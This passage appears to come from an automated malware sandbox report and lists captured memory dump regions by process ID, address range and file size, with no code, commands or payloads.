                                                                                                                              • memory/4968-278-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                80KB

                                                                                                                              • memory/4988-274-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5020-360-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5024-357-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5048-244-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5080-254-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5080-257-0x00000000009A0000-0x00000000009AD000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                52KB

                                                                                                                              • memory/5156-354-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5200-353-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5228-309-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5288-363-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5296-320-0x0000000000400000-0x00000000004BE000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                760KB

                                                                                                                              • memory/5296-317-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5304-366-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5356-350-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5412-331-0x0000000000400000-0x000000000044C000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                304KB

                                                                                                                              • memory/5412-328-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5448-359-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5460-333-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5468-334-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5552-339-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5552-340-0x00000000032F0000-0x00000000035D0000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                2.9MB

                                                                                                                              • memory/5552-341-0x0000000003950000-0x000000000395F000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                60KB

                                                                                                                              • memory/5552-342-0x0000000003AE0000-0x0000000003AF5000-memory.dmp
                                                                                                                                Filesize

                                                                                                                                84KB

                                                                                                                              • memory/5644-361-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5732-343-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5768-346-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5796-364-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5844-352-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5860-365-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5904-347-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/5992-348-0x0000000000000000-mapping.dmp
                                                                                                                              • memory/6068-349-0x0000000000000000-mapping.dmp